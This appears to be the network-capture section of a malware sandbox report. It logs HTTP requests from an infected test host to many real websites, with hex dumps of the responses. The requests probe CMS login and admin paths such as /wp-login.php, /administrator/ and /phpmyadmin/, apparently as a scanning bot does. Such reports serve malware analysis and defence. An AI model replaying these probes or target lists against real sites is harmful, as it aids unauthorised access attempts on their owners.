                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.091070890 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:27 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.091150045 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                85192.168.2.65386766.115.173.18880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.971848011 CET243OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: conceptualintegration.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.905323982 CET521INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=61856a829e82e88d96a552752897d0e1; path=/
                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                location: http://conceptualintegration.com
                                                                                                                                                                                                                                                                                                                x-litespeed-cache: miss
                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                vary: User-Agent


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                86192.168.2.65387969.160.38.280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.980463982 CET225OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.144412994 CET228INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 10File not found.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.146310091 CET262OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: 3marc.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://3marc.com/wp-login.php
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.307379007 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                87192.168.2.6538823.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.980536938 CET240OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                88192.168.2.65499264.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.986442089 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://fedyanin.ws/administrator/


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                89192.168.2.65499364.70.19.20380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:27.987327099 CET282OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: fedyanin.ws
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://fedyanin.ws/administrator/


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                90192.168.2.65520566.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.010267973 CET234OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.143148899 CET1148INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                91192.168.2.6538763.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.011493921 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                92192.168.2.65386885.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.011555910 CET226OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.216547012 CET514INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Location: /Home/Login?ReturnUrl=%2fadministrator%2f
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 48 6f 6d 65 2f 4c 6f 67 69 6e 3f 52 65 74 75 72 6e 55 72 6c 3d 25 32 66 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 66 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="/Home/Login?ReturnUrl=%2fadministrator%2f">here</a>.</h2></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.287235975 CET252OUTGET /Home/Login?ReturnUrl=%2fadministrator%2f HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.503817081 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=1m3pbchoknzanfqou5v0n44x; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=1m3pbchoknzanfqou5v0n44x; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                Set-Cookie: __RequestVerificationToken=L4fpWIQFNsub_ozR1dLpTZAJEWIJbg0-lgoDkDO8Qi8CWGprPFppiqDMoPZXNqF4WckQK4Xpzk7D75Wvq450-nfzCBGxRAFFOm9JKEQ5MEM1; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6859
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db
